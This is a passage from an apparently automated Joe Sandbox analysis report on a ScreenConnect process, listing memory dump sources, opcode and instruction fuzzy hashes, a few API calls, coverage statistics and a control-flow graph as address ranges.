                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f3898f307eb282aec5d676adc35048f88d75326677619fb5ead2247e5cbb0d86
                                                                                    • Instruction ID: e2e637aecc076e64c4db22b7857f20042e962a65c57eab6d3b2d620c60ab040e
                                                                                    • Opcode Fuzzy Hash: f3898f307eb282aec5d676adc35048f88d75326677619fb5ead2247e5cbb0d86
                                                                                    • Instruction Fuzzy Hash: 4CE0C9B6D00119DF8790EFA899421DAFBB4EF58204B10806AC52DDB201E3368B039FD0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 841345c12c1b5b8f65e99e11c59485bfd099da55357c8a45385d809beaebeb56
                                                                                    • Instruction ID: 52b3688bf1f5523cc436d532137f804aaf5a37baa39e203fd4f268be268a0d21
                                                                                    • Opcode Fuzzy Hash: 841345c12c1b5b8f65e99e11c59485bfd099da55357c8a45385d809beaebeb56
                                                                                    • Instruction Fuzzy Hash: 26E020357012055FC314A51AE9405D7F7AEDBCD230B110438E20CC7359DD379C83C2A0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0b4f32b5ee0fcee77f0d0a4cbfdb8cffb876221058818026d3dc3f31432b3121
                                                                                    • Instruction ID: 792c33849474a237b30bcbc117eca1b1a51659020873ce70eae50aceba09da9a
                                                                                    • Opcode Fuzzy Hash: 0b4f32b5ee0fcee77f0d0a4cbfdb8cffb876221058818026d3dc3f31432b3121
                                                                                    • Instruction Fuzzy Hash: F7E086367052055BC318A52AE950997F7AEDBC9624B114479A10CC7359DE769C8386A0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9c6a6164451b4d501b454c940f13ba353464a591b597cba15308c8d21817b7f3
                                                                                    • Instruction ID: 5d82a33890fbdc3d98a36c7602ab35115fede937a275f908183af888fb9f4247
                                                                                    • Opcode Fuzzy Hash: 9c6a6164451b4d501b454c940f13ba353464a591b597cba15308c8d21817b7f3
                                                                                    • Instruction Fuzzy Hash: 28E06D303002008FC3149B5AD144D16B7E6EFC9725B1584A9E9098B3A1DB71FC41CB50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f3accf7ec1fd12a6a36e3626d95ebeb4505a06f2e056dcd45f2061d07535b66e
                                                                                    • Instruction ID: 1d3c5d47c509d6c1f8a5fa4d5382656dfa27f6c52aacf27ed3921ae6081bfb43
                                                                                    • Opcode Fuzzy Hash: f3accf7ec1fd12a6a36e3626d95ebeb4505a06f2e056dcd45f2061d07535b66e
                                                                                    • Instruction Fuzzy Hash: 07E0DF753046505FD341D738D889D557FE5AF4A215B09C0DAE4088B3A3E671DC02CB80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e2a8e98a0eca7de39b2c1b12ac6f618e7ed7fcd9c402da46e4e9a8cf167ceb8b
                                                                                    • Instruction ID: d05e622e77ec34a525ff6cf4f9f52c51c4eaf2501ea7a441b181d103849ae0fd
                                                                                    • Opcode Fuzzy Hash: e2a8e98a0eca7de39b2c1b12ac6f618e7ed7fcd9c402da46e4e9a8cf167ceb8b
                                                                                    • Instruction Fuzzy Hash: 59E0DF30505249FFCB01EFB4E89269CBFF1EB4620070048DED408EB205EA342E55E751
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fa926553dbea9c7a5430891b9108979a3f16cc4d36da4f487aa00aa9d94c7079
                                                                                    • Instruction ID: bc719659558a54c49e63a21587874457eef9050322df3ce5a6f4a54ce7821143
                                                                                    • Opcode Fuzzy Hash: fa926553dbea9c7a5430891b9108979a3f16cc4d36da4f487aa00aa9d94c7079
                                                                                    • Instruction Fuzzy Hash: 9DE0B675E002299F8B80EFADD9015AEFBF4EF48210B10846AD91DE7201E7319B12CFC1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e5b6362517943327abb4771ad5c6e1b75dac1138d83576f961e865c9fbcae2d3
                                                                                    • Instruction ID: 827c813bd9c759e0e38dcd291993df722469c09d0142cd9067a628c2e9717c8f
                                                                                    • Opcode Fuzzy Hash: e5b6362517943327abb4771ad5c6e1b75dac1138d83576f961e865c9fbcae2d3
                                                                                    • Instruction Fuzzy Hash: 92D052343201248FCB88EB78E4648AA37DAAF8892035080A4E00DCB728EE20EC0187E0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 35711ad04a7219c9c22c37f8ffc6c104275a1c34e2daaaf2bbd4377fff069f7f
                                                                                    • Instruction ID: ccb52adb841789444d735a3c0be800801973f1a73bee88243d68afb01cdf6448
                                                                                    • Opcode Fuzzy Hash: 35711ad04a7219c9c22c37f8ffc6c104275a1c34e2daaaf2bbd4377fff069f7f
                                                                                    • Instruction Fuzzy Hash: F1D05E353501245FD744EB29E985C6577EAEF89614755C0A9E90CCB362D971EC018A90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3e576e3edf8be260be2b06cc96c91efcab61f39f34a1cf0dec30ae543d406058
                                                                                    • Instruction ID: ac0a6b3592793314e39c14455891b7a0d6bdbba6c3090c3c2510bc497398c68b
                                                                                    • Opcode Fuzzy Hash: 3e576e3edf8be260be2b06cc96c91efcab61f39f34a1cf0dec30ae543d406058
                                                                                    • Instruction Fuzzy Hash: 24D05E9381D0808FE31213BE78B40A03FB0FA6A3A135C48CAD046FB177F209A44BE391
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3893605690178638e601f7620635a42c72634b8d73d8066e80690cf6dd6970b3
                                                                                    • Instruction ID: 35570e766266d76f7d5bc6ed9259c47602c267768ef7e4904baa7ce7f0f8d8f6
                                                                                    • Opcode Fuzzy Hash: 3893605690178638e601f7620635a42c72634b8d73d8066e80690cf6dd6970b3
                                                                                    • Instruction Fuzzy Hash: 72D01770A01209FF8B44EFA9E90659DBBF9EB49204B1085ADD809E7204EA316E05AB91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9e6962889a3a6aa106dcd853e8eb97b41596c6520130c8cd35849bf96a87d71f
                                                                                    • Instruction ID: 63fcca93dbf28239def435e48c84d56021de0da96775c79c10176ed02d22c4b7
                                                                                    • Opcode Fuzzy Hash: 9e6962889a3a6aa106dcd853e8eb97b41596c6520130c8cd35849bf96a87d71f
                                                                                    • Instruction Fuzzy Hash: 8DE0C232404708CEC301BB78C4144A9BBB8EE91301F00C64EE84D67022FF70E184E742
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4880ac3f5e1afedc1c13c4b9dbbd9243fc259d02a29af83b9281abdbfac50ecf
                                                                                    • Instruction ID: 3858df2b0ac10afd01c3851cbe0606e0abfab8a4f1f5f6eb5b2662afa5fc168f
                                                                                    • Opcode Fuzzy Hash: 4880ac3f5e1afedc1c13c4b9dbbd9243fc259d02a29af83b9281abdbfac50ecf
                                                                                    • Instruction Fuzzy Hash: 3BD01770A01209EFCB00EFBAE90059DBBF9EB88214B1046A8D409E7204EA326E449B91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e0868c0991fbe8e1b649604820378c0cf0997bb06d072725a1ffca3cfb110281
                                                                                    • Instruction ID: d0bc743ba0a17a61e80db4432c734d3c2eafe3fa4bb96b600bacadb279164a66
                                                                                    • Opcode Fuzzy Hash: e0868c0991fbe8e1b649604820378c0cf0997bb06d072725a1ffca3cfb110281
                                                                                    • Instruction Fuzzy Hash: A9D0C932814B0D8AC701BBB8D4544A9F7B8EED5210F00DB5AE88A67122FFB0E6D0D681
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ece8574fce249474f96272c35e3a5587dc3c70cae32a8597006811f8922dd735
                                                                                    • Instruction ID: 6410812b8a09cb153ee5f6bbc80d324e90729e1922e6470cbf252d73fe1e2c26
                                                                                    • Opcode Fuzzy Hash: ece8574fce249474f96272c35e3a5587dc3c70cae32a8597006811f8922dd735
                                                                                    • Instruction Fuzzy Hash: 9DC0929A44E3E06EDB13A7F08860915BFA0BE4310938E82DFC495CF1A3E818E454C376
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fab8d04d4e65521090f095dab0a3d85deb17eb99e6f7bc0bc97259446380aa2c
                                                                                    • Instruction ID: be3ebe1a9b90e026e36c10f9e2a692f655b2d75ad1c3997949e09ee87598a3e4
                                                                                    • Opcode Fuzzy Hash: fab8d04d4e65521090f095dab0a3d85deb17eb99e6f7bc0bc97259446380aa2c
                                                                                    • Instruction Fuzzy Hash: 09A011302000008BCA08CA00C20880EBBA2ABE0300B00CA28A00AC20288A308C00EA02
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3519752168.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_17b0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Hxq
                                                                                    • API String ID: 0-2956916855
                                                                                    • Opcode ID: a5cd64bb69f766c66ea07a68784b04f888f11e75a7090a6fa6dd354ac541094f
                                                                                    • Instruction ID: 04ce9d09061bd5a0fd56c6ea8d6f3edc1b15fb92123238b5c51162597e302ba1
                                                                                    • Opcode Fuzzy Hash: a5cd64bb69f766c66ea07a68784b04f888f11e75a7090a6fa6dd354ac541094f
                                                                                    • Instruction Fuzzy Hash: C7A14A31D1025A8FCF15DFA9C4805DDFBB1FF89314F25866AD405BB245EB34AA86CB90
                                                                                    APIs
                                                                                    • RtlGetVersion.NTDLL(0000009C), ref: 017B4DBE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3519752168.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_17b0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: Version
                                                                                    • String ID: `Qtq$s4h$s4h
                                                                                    • API String ID: 1889659487-2749137109
                                                                                    • Opcode ID: ebeea718c034a4e69f70985604bc730ffa60821ea3510cb9ef6dd09d3341dbb8
                                                                                    • Instruction ID: 47689948cb2d13d2576a45b0b70dc6a93f0904184201f5cba7c7740e32866e98
                                                                                    • Opcode Fuzzy Hash: ebeea718c034a4e69f70985604bc730ffa60821ea3510cb9ef6dd09d3341dbb8
                                                                                    • Instruction Fuzzy Hash: 25211275A05268DFEF60CF59C844B99FBB9FB08310F0082D9D50DA7290CB756A98CF92

                                                                                    Execution Graph

                                                                                    Execution Coverage:12.5%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:5
                                                                                    Total number of Limit Nodes:1
                                                                                    execution_graph 14915 7ffd9b628014 14917 7ffd9b62801d 14915->14917 14916 7ffd9b628082 14917->14916 14918 7ffd9b6280f6 SetProcessMitigationPolicy 14917->14918 14919 7ffd9b628152 14918->14919

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
control_flow_graph 1119 7ffd9b936e7a-7ffd9b936eb5 1126 7ffd9b936eb6-7ffd9b936edc 1119->1126 1130 7ffd9b936ede-7ffd9b936f21 1126->1130 1135 7ffd9b936f26-7ffd9b936f4c 1130->1135 1139 7ffd9b936f4e-7ffd9b936fcc 1135->1139 1146 7ffd9b936fce-7ffd9b936fea 1139->1146 1147 7ffd9b937016-7ffd9b937026 1139->1147 1148 7ffd9b936ff0-7ffd9b93700e call 7ffd9b930d60 * 2 1146->1148 1149 7ffd9b9373f8-7ffd9b937416 call 7ffd9b930d60 * 2 1146->1149 1153 7ffd9b937028-7ffd9b93702a 1147->1153 1154 7ffd9b93702c-7ffd9b93703a call 7ffd9b930120 1147->1154 1167 7ffd9b93728e-7ffd9b9372ac call 7ffd9b930d60 * 2 1148->1167 1168 7ffd9b937014-7ffd9b937015 1148->1168 1165 7ffd9b937522-7ffd9b93752d 1149->1165 1166 7ffd9b93741c-7ffd9b937423 1149->1166 1157 7ffd9b93703d-7ffd9b937052 1153->1157 1154->1157 1170 7ffd9b937054-7ffd9b937056 1157->1170 1171 7ffd9b937058-7ffd9b93707c call 7ffd9b936c40 * 2 1157->1171 1172 7ffd9b937425-7ffd9b937434 1166->1172 1173 7ffd9b937436-7ffd9b937438 1166->1173 1190 7ffd9b9372ae-7ffd9b9372b8 1167->1190 1191 7ffd9b9372d6-7ffd9b9372f4 call 7ffd9b930d60 * 2 1167->1191 1168->1147 1175 7ffd9b93707f-7ffd9b937094 1170->1175 1171->1175 1172->1173 1185 7ffd9b93743a 1172->1185 1177 7ffd9b93743f-7ffd9b937463 1173->1177 1186 7ffd9b937096-7ffd9b937098 1175->1186 1187 7ffd9b93709a-7ffd9b9370be call 7ffd9b936c40 * 2 1175->1187 1188 7ffd9b9374af-7ffd9b9374c5 1177->1188 1189 7ffd9b937465-7ffd9b937482 1177->1189 1185->1177 1194 7ffd9b9370c1-7ffd9b9370d6 1186->1194 1187->1194 1201 7ffd9b93752e-7ffd9b9375a7 1189->1201 1202 7ffd9b937488-7ffd9b9374ad 1189->1202 1197 7ffd9b9372cc 1190->1197 1198 7ffd9b9372ba-7ffd9b9372ca 1190->1198 1215 7ffd9b9373ab-7ffd9b9373b6 1191->1215 1216 7ffd9b9372fa-7ffd9b937305 1191->1216 1212 7ffd9b9370d8-7ffd9b9370da 1194->1212 1213 7ffd9b9370dc-7ffd9b9370f4 call 7ffd9b936c40 1194->1213 1204 7ffd9b9372ce-7ffd9b9372cf 1197->1204 1198->1204 1223 7ffd9b9375f0-7ffd9b937646 1201->1223 1224 7ffd9b9375a9-7ffd9b9375ed 1201->1224 1202->1188 1204->1191 1218 7ffd9b937103-7ffd9b937111 1212->1218 1213->1218 1233 7ffd9b9373b8-7ffd9b9373ba 1215->1233 1234 7ffd9b9373bc-7ffd9b9373cb call 7ffd9b930120 1215->1234 1229 7ffd9b937307-7ffd9b937309 1216->1229 1230 7ffd9b93730b-7ffd9b93731a call 7ffd9b930120 1216->1230 1231 7ffd9b937113-7ffd9b937115 1218->1231 1232 7ffd9b937117-7ffd9b937125 call 7ffd9b930120 1218->1232 1254 7ffd9b937648-7ffd9b937649 1223->1254 1255 7ffd9b93764c-7ffd9b937670 1223->1255 1224->1223 1237 7ffd9b93731d-7ffd9b937358 1229->1237 1230->1237 1239 7ffd9b937128-7ffd9b93713f 1231->1239 1232->1239 1241 7ffd9b9373ce-7ffd9b9373d0 1233->1241 1234->1241 1251 7ffd9b93735b-7ffd9b937361 1237->1251 1239->1167 1265 7ffd9b937145-7ffd9b93714c 1239->1265 1241->1165 1243 7ffd9b9373d6-7ffd9b9373e8 1241->1243 1243->1149 1257 7ffd9b937363-7ffd9b93736b 1251->1257 1258 7ffd9b937374-7ffd9b93737c 1251->1258 1254->1255 1274 7ffd9b9376a2-7ffd9b9376ab 1255->1274 1275 7ffd9b937672-7ffd9b937681 1255->1275 1260 7ffd9b93737d-7ffd9b93737e 1257->1260 1263 7ffd9b93736d-7ffd9b937372 1257->1263 1258->1260 1261 7ffd9b93738e-7ffd9b9373a9 1258->1261 1264 7ffd9b937383-7ffd9b93738d call 7ffd9b936c78 1260->1264 1261->1215 1261->1251 1263->1264 1264->1261 1265->1167 1268 7ffd9b937152-7ffd9b937169 1265->1268 1280 7ffd9b93719e-7ffd9b9371a9 1268->1280 1281 7ffd9b93716b-7ffd9b93717d 1268->1281 1278 7ffd9b937683-7ffd9b937684 1275->1278 1279 7ffd9b937687-7ffd9b9376a1 1275->1279 1278->1279 1288 7ffd9b9371af-7ffd9b9371be call 7ffd9b930120 1280->1288 1289 7ffd9b9371ab-7ffd9b9371ad 1280->1289 1285 7ffd9b93717f-7ffd9b937181 1281->1285 1286 7ffd9b937183-7ffd9b937191 call 7ffd9b930120 1281->1286 1291 7ffd9b937194-7ffd9b937197 1285->1291 1286->1291 1293 7ffd9b9371c1-7ffd9b9371c3 1288->1293 1289->1293 1291->1280 1294 7ffd9b937278-7ffd9b93728a 1293->1294 1295 7ffd9b9371c9-7ffd9b9371e0 1293->1295 1294->1167 1295->1294 1300 7ffd9b9371e6-7ffd9b937203 1295->1300 1303 7ffd9b93720f 1300->1303 1304 7ffd9b937205-7ffd9b93720d 1300->1304 1305 7ffd9b937211-7ffd9b937213 1303->1305 1304->1305 1305->1294 1307 7ffd9b937215-7ffd9b93721f 1305->1307 1308 7ffd9b93722d-7ffd9b937235 1307->1308 1309 7ffd9b937221-7ffd9b93722b call 7ffd9b9318c0 1307->1309 1310 7ffd9b937263-7ffd9b937276 call 7ffd9b936c68 1308->1310 1311 7ffd9b937237-7ffd9b937242 1308->1311 1309->1167 1309->1308 1310->1167 1311->1310
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f0ec053c08c6bf535fcf533e66da04c200ce964c024aafb8bd92517d4630eb22
                                                                                    • Instruction ID: ace2eafa3990a1f2cce26e428af9fcdba3bae42c0762d08caf2a4e39f035173d
                                                                                    • Opcode Fuzzy Hash: f0ec053c08c6bf535fcf533e66da04c200ce964c024aafb8bd92517d4630eb22
                                                                                    • Instruction Fuzzy Hash: C0323832B2EA4E5FE7B997A88474AB967D2EF84340F16407AD05DC71E2ED18B9068341
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 869ea5b332244830235ff156d783c6de1bfb0be7c686d5b814f76a3ba9967c73
                                                                                    • Instruction ID: 25911d1f15eb176aebc1fd303b45e94f6f6a31157b631fa7b99e5651e1468faf
                                                                                    • Opcode Fuzzy Hash: 869ea5b332244830235ff156d783c6de1bfb0be7c686d5b814f76a3ba9967c73
                                                                                    • Instruction Fuzzy Hash: BAF14932F2EA4E5BEB7D9AA884756B437D2EF94340F1641B9D85DC71E7DD28BC028240

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3546536860.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b620000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: MitigationPolicyProcess
                                                                                    • String ID:
                                                                                    • API String ID: 1088084561-0
                                                                                    • Opcode ID: d30cd6d0d53a4d3b9d3c513b1db45f92525174ea349eb43311df59a9cc69854b
                                                                                    • Instruction ID: 3d0acdb380d7d99b16cd89f53181424703ecfb564e1dfbde244459122537e698
                                                                                    • Opcode Fuzzy Hash: d30cd6d0d53a4d3b9d3c513b1db45f92525174ea349eb43311df59a9cc69854b
                                                                                    • Instruction Fuzzy Hash: C5514631D0CB494FEB28AFA89C4A5E97BE0EF55310F04017EE099C7192DF68B9468B91

                                                                                    Control-flow Graph

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 03aac55f38485bb1e43999983906ea606532b07cfd259991df0aebea1f20ac59
                                                                                    • Instruction ID: 6329a089a5417a76d6ce8593d100bda1e4bdb2668efd3a8c8e468f1b7ff5a52f
                                                                                    • Opcode Fuzzy Hash: 03aac55f38485bb1e43999983906ea606532b07cfd259991df0aebea1f20ac59
                                                                                    • Instruction Fuzzy Hash: 81223B72B2AE4E1FEBA8DBA884A56B533D2FFA4380B054179D41DC71A6DD24FD068740
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 285224ccf3c91c513666ec0e30539b5849073b14cad77be6432262bdf4eb5717
                                                                                    • Instruction ID: f5ed82ba10235055ed33d591461c14f1e1cf3cc9447d42495d1da075571d9fea
                                                                                    • Opcode Fuzzy Hash: 285224ccf3c91c513666ec0e30539b5849073b14cad77be6432262bdf4eb5717
                                                                                    • Instruction Fuzzy Hash: 9EE12730B2EB4E5FEBA9EBA884617B937D1EF58700F0540B9D48DCB1A7DD28E9418740
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bf56881611cd3ceb0ea85870d4137ea6a2c733e18808b8f5bd4d0159a7b28cc0
                                                                                    • Instruction ID: 1e12a9c3c7957fa59c455668dd0ebf734033a5586f2466a235c63638daa76dc4
                                                                                    • Opcode Fuzzy Hash: bf56881611cd3ceb0ea85870d4137ea6a2c733e18808b8f5bd4d0159a7b28cc0
                                                                                    • Instruction Fuzzy Hash: 6EB18B32B1EE4E2FDF68EA6888618B537D1EF54340B05417DD84D8B1E7ED15FA0A8781
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 465e92f120d5ff200b6bbabe3a66e2161840e8fdccd1352216cb9a7d5c4514df
                                                                                    • Instruction ID: 2c6afc109fa4d67babbc48bdb5ec7c0a66464c71f81f9309517219239c72a5bf
                                                                                    • Opcode Fuzzy Hash: 465e92f120d5ff200b6bbabe3a66e2161840e8fdccd1352216cb9a7d5c4514df
                                                                                    • Instruction Fuzzy Hash: 3DA15A62B2EF8F5BE7A8DAAC44616B533D2FFA4740705417AC45EC71E6DD24F9068340
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1b24f90cdd26d0ef09caa5108aa9ff6ce861ca83c49d8e63e8e77279314488e1
                                                                                    • Instruction ID: e4dd2edb82dc0c738e79121623751309c8473c6982f9e248a4d0c9996cfa163b
                                                                                    • Opcode Fuzzy Hash: 1b24f90cdd26d0ef09caa5108aa9ff6ce861ca83c49d8e63e8e77279314488e1
                                                                                    • Instruction Fuzzy Hash: 9A717A7272DB1E5BEB789A9DA49D27573C1EB99360B01013ED48BC32A2ED26FC434741
                                                                                    Memory Dump Source
